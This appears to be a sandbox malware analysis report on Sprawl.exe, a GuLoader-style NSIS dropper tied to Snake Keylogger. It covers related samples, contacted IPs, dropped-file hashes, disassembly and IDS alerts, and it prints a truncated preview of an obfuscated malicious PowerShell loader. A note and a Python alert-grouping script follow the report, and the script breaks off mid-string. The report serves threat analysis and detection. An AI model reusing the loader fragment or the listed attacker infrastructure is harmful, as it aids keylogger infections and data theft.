Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docx | malicious | Mamba2FA | 217.160.0.215
EMnyl2klUV.elf | malicious | Mirai | 217.160.45.92
Associated Sample Name / URL | Detection | Threat Name | Context

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 188.114.97.3
New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
z547GEViTFyfCZdLZP.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe | malicious | Snake Keylogger | 188.114.97.3
TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
6 654398.vbs | malicious | FormBook, GuLoader | 149.154.167.220
FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Massageapparater.vbs | malicious | FormBook, GuLoader | 149.154.167.220
FZCO - PO#12345.exe | malicious | AgentTesla | 149.154.167.220
New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Ref#150689.vbe | malicious | AgentTesla | 149.154.167.220

Match: 37f463bf4616ecd445d4a1937da06e19
Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 142.250.184.238, 142.250.185.65
Justificante.exe | malicious | FormBook, GuLoader | 142.250.184.238, 142.250.185.65
6 654398.vbs | malicious | FormBook, GuLoader | 142.250.184.238, 142.250.185.65
FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 142.250.184.238, 142.250.185.65
Massageapparater.vbs | malicious | FormBook, GuLoader | 142.250.184.238, 142.250.185.65
phc.exe | malicious | Unknown | 142.250.184.238, 142.250.185.65
phc.exe | malicious | Unknown | 142.250.184.238, 142.250.185.65
001_215_EA2047939_202410210815.exe | malicious | GuLoader, Snake Keylogger | 142.250.184.238, 142.250.185.65
Fignen234.exe | malicious | GuLoader | 142.250.184.238, 142.250.185.65
Fignen234.exe | malicious | FormBook, GuLoader | 142.250.184.238, 142.250.185.65
                                                                                                                          No context
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):14744
                                                                                                                          Entropy (8bit):4.992175361088568
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                                                          MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                                                          SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                                                          SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                                                          SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):880264
                                                                                                                          Entropy (8bit):7.715640679390863
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:l9/IyjazmRR+BZhOLlpJjdCPwwdw6ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZzz:/A/KqZhOnJdyzp+alCJmvulW6Nd0vo
                                                                                                                          MD5:47FD98348B7D314E4E9DAE46E5F1E1A1
                                                                                                                          SHA1:CAFE48404707E61235BFBE6646D8072AF4298E21
                                                                                                                          SHA-256:125B4582B7DD2221044FB257F580DA57E4DC61B03A6C35E208FED973F71C28A1
                                                                                                                          SHA-512:8A1DEDA7D7E8E80D8B2E62AD0D9D4400B1D865EA322955E577FC439A8A0F1D6D3CB912397ECB6458941FD7FD566C1FDBDF4C4ED02C72234FA543BFCB45DB845A
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):15845
                                                                                                                          Entropy (8bit):7.693658939604953
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p
                                                                                                                          MD5:762778DFE1B62D3430B44A32AEDC03E0
                                                                                                                          SHA1:7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5
                                                                                                                          SHA-256:9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8
                                                                                                                          SHA-512:B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91155
                                                                                                                          Entropy (8bit):3.2484639775571122
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4
                                                                                                                          MD5:55DD84338306B8F361571D07E3D03F25
                                                                                                                          SHA1:5F086147B0ED6D4CBE40B6F81C1003EB07714B94
                                                                                                                          SHA-256:016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45
                                                                                                                          SHA-512:045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):411197
                                                                                                                          Entropy (8bit):3.2412073600303604
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC
                                                                                                                          MD5:9548F6F7A71852794789DE0AC5FDE451
                                                                                                                          SHA1:74C915E2C9C110929FD87C907BE17930B0B66B24
                                                                                                                          SHA-256:2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471
                                                                                                                          SHA-512:0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE
                                                                                                                          Malicious:false

Process:C:\Users\user\Desktop\Sprawl.exe
File Type:data
Category:dropped
Size (bytes):326869
Entropy (8bit):7.638472515962235
Encrypted:false
SSDEEP:6144:fINELrIDzZfkJ4/LmVIO6SSWngwET88GaD5pQq5ICM+byHGEQX6l9bQu2eM:wGLEBMJ4/L933W1yGaDAqCCMgWGxgM
MD5:0333FB2B0E19A85944C9EA2538F15529
SHA1:CB7CF6AEF6B3409205B0EFA337EB5FC4F84FA237
SHA-256:3529AB40264CB6806CB5ED7E64D98D29B94362987720CD633E4785F41E0163E2
SHA-512:5FA5102E95FB393E47FEA92D7CEE9B0F66BFAA94EC0CACE06A83BD18413EB9D7968E6973A8843AEB7F9B877418A11E3686F61D326569392AE3E6CB65CC51EA5E
Malicious:false

Process:C:\Users\user\Desktop\Sprawl.exe
File Type:ASCII text, with very long lines (3041), with CRLF, LF line terminators
Category:dropped
Size (bytes):55184
Entropy (8bit):5.361768606025368
Encrypted:false
SSDEEP:1536:qBW8/PWnOQz17PFJoL9Wt34bzGFC3fm5Xa5Z9YwsklLt7:qj/PWnOa7NG9034fGQ3fmFTI7
MD5:6F2C225FF02A35F64C6157286F9E90B1
SHA1:FDFB286088FD3CB3C3FA39F39E2E7BA48B3C6624
SHA-256:0F4CAA809A6B9AD70A305958AF34E60B82F3080BBB7067F316CA85702FFBA443
SHA-512:C5FB4EAFB4C29B774648BCEC26736AD0808815D10618C95B723DE9296240E6F9CBC35E90CC4439266F013810F16DDE0F44A840FA928D8BE2A8562CC5AC8D2EB5
Malicious:true
Preview:$Transl=$Retiraden;..<#Crosswalk Spgelseshistorien Podagry Reje Pithoi Nglestillingen #>..<#Skadeslsholdelse checkkonti Afmatningens Crampet #>..<#Knbeskytternes Pontonbro Glassed Stikprvestandardafvigelsens Estells Toying #>..<#Svangerskabets Vejbygnings Nonrelated Anorthophyre #>..<#Brandlov bidrag Cotwinned Thyrostracan Natronens Positivitets #>..<#Perigeum smykk Flimsiest Pawnshops beskuet Tilsynsassistenten Diddles #>...$Hypoazoturia = @'. Befo. ravs$snowiUDebitnRevoll LosnaVersayD sassKheth=Byg,i$unineU R dinUd vedForlae Ichurpresuv ,truiKovsvsRelatnVivreiSenatnRoveng,udorsStraavAb rrere atjIndmalUforseAntr,d DingnaabneiLam nnSysteg Over;Subor.UnarifU,unsu RevonMordacPennet erbyiS cceoAfficnNyrer DecoSB,lageK ssepRemi,aExcerr WittaE brytUdelaiAdgano Cor.n forse tobyrJ.spenTegneeRundesBantu2Chyt 0Burgu7Green Cross( N,rs$ Ss nTSkorzyOmninl everv AriotPetiteInterrfordgeSericdInfileV,skerNorma,Elect$ Teles G ttv compitabskpastrossteppeTol unSignod ,kine Attrs Soni)Tbr d Estre{Ldrik.

Process:C:\Users\user\Desktop\Sprawl.exe
File Type:ASCII text, with very long lines (360), with CRLF line terminators
Category:dropped
Size (bytes):362
Entropy (8bit):4.295609901239941
Encrypted:false
SSDEEP:6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js
MD5:A47DE65B255D62E154E75208730B37D2
SHA1:9AD95C489EABDBCD12C02CD312C85D0C73A565F7
SHA-256:1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784
SHA-512:206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A
Malicious:false
Preview:beboere sletteprogrammerne afbrndtes untruthfulness,methanolysis blokniveauets tegnbaseret keisar arbejdsmndene rger,lsenets quindecimvir complexify hundevagten cymblernes.cressier immediate batchkrslerne antisepalous cryptonymic pings,pampination spytkirtlen vandranunkel stormmaage,diversificer udtalendes attributgrammatiks snedkeris sati frailejon rvturene..

Process:C:\Users\user\Desktop\Sprawl.exe
File Type:GTA audio index data (SDT)
Category:dropped
Size (bytes):339224
Entropy (8bit):3.2329059465811363
Encrypted:false
SSDEEP:3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN
MD5:2AFAF6367CF5833A8885999FEFA5B44A
SHA1:58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9
SHA-256:66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074
SHA-512:A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4
Malicious:false

File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.715640679390863
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Sprawl.exe
File size:880'264 bytes
MD5:47fd98348b7d314e4e9dae46e5f1e1a1
SHA1:cafe48404707e61235bfbe6646d8072af4298e21
SHA256:125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1
SHA512:8a1deda7d7e8e80d8b2e62ad0d9d4400b1d865ea322955e577fc439a8a0f1d6d3cb912397ecb6458941fd7fd566c1fdbdf4c4ed02c72234fa543bfcb45db845a
SSDEEP:12288:l9/IyjazmRR+BZhOLlpJjdCPwwdw6ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZzz:/A/KqZhOnJdyzp+alCJmvulW6Nd0vo
TLSH:6C152356F79898FBE83A813064BEC932D660AC750561530733A6BF79983323E581F1CE
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.....
Icon Hash:4ccc524656d64e01
Entrypoint:0x40310f
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007F4A2CBE1FA3h
push ebx
call 00007F4A2CBE4F11h
cmp eax, ebx
je 00007F4A2CBE1F99h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F4A2CBE4E8Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F4A2CBE1F7Dh
push ebp
push 00000009h
call 00007F4A2CBE4EE4h
push 00000007h
call 00007F4A2CBE4EDDh
mov dword ptr [0042E404h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [0042E4B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00428828h
call dword ptr [00407174h]
push 00409188h
push 0042DC00h
call 00007F4A2CBE4B07h
call dword ptr [0040709Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007F4A2CBE4AF5h
push ebx
call dword ptr [00407154h]

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7534 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x42000 | 0x1aa58 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5fdd | 0x6000 | 38462d04cfdbc4943d18be461d53cc3e | False | 0.6783854166666666 | data | 6.499697507009752 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1352 | 0x1400 | 3d134ae5961af9895950a7ee0adc520a | False | 0.4583984375 | data | 5.207538993430304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x254f8 | 0x600 | 2d00401e0c64d69b6d0ccb877d9f624e | False | 0.4544270833333333 | data | 4.0323505938358934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2f000 | 0x13000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x42000 | 0x1aa58 | 0x1ac00 | 098718c0c5bf54afe6e125c2f1ac35ba | False | 0.23448452102803738 | data | 3.706045365348602 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x42460 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x427c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.09021944871643203
RT_ICON | 0x52ff0 | 0x32f2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9443336911516639
RT_ICON | 0x562e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.16089211618257263
RT_ICON | 0x58890 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.18738273921200752
RT_ICON | 0x59938 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.31050106609808104
RT_ICON | 0x5a7e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.440884476534296
RT_ICON | 0x5b088 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.5635838150289018
RT_ICON | 0x5b5f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.2703900709219858
RT_ICON | 0x5ba58 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.21908602150537634
RT_ICON | 0x5bd40 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.3716216216216216
RT_DIALOG | 0x5be68 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x5bfb0 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0x5c0f0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x5c1f0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x5c310 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x5c3d8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5c438 | 0x92 | data | English | United States | 0.6575342465753424
RT_VERSION | 0x5c4d0 | 0x248 | data | English | United States | 0.5308219178082192
RT_MANIFEST | 0x5c718 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-22T16:11:53.877008+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49987 | 142.250.184.238 | 443 | TCP
2024-10-22T16:11:53.895201+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49986 | 142.250.184.238 | 443 | TCP
2024-10-22T16:12:01.180935+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49990 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:04.537983+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49991 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:04.725700+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49990 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:05.444916+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49993 | 188.114.97.3 | 443 | TCP
2024-10-22T16:12:06.084842+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49991 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:06.475477+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49995 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:06.804302+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49996 | 188.114.97.3 | 443 | TCP
2024-10-22T16:12:07.709864+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49998 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:08.100608+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49999 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:17.408699+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 50021 | 188.114.97.3 | 443 | TCP
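The IDS rows above are the ET PRO (SID range 28xxxxx) Suricata alerts that fired during the run. An analyst usually wants them collapsed into "which signature, against which destination, over how many sessions and what time window", plus a plain list of destination IP:port pairs to hunt for. The following script is an added example, not part of the Joe Sandbox report: the twelve alert rows are copied from the table above, while the parsing, the grouping by (SID, destination) and the session count derived from distinct source ports are my own construction.

```python
"""Group the sandbox's ET PRO alert rows by signature and destination.

Added example, not part of the Joe Sandbox report. The alert rows are copied
from the report; the parsing and summary logic are an assumption of how an
analyst would post-process them.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# The twelve alert rows from the report, pipe-delimited. Columns:
# Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
ALERT_ROWS = """\
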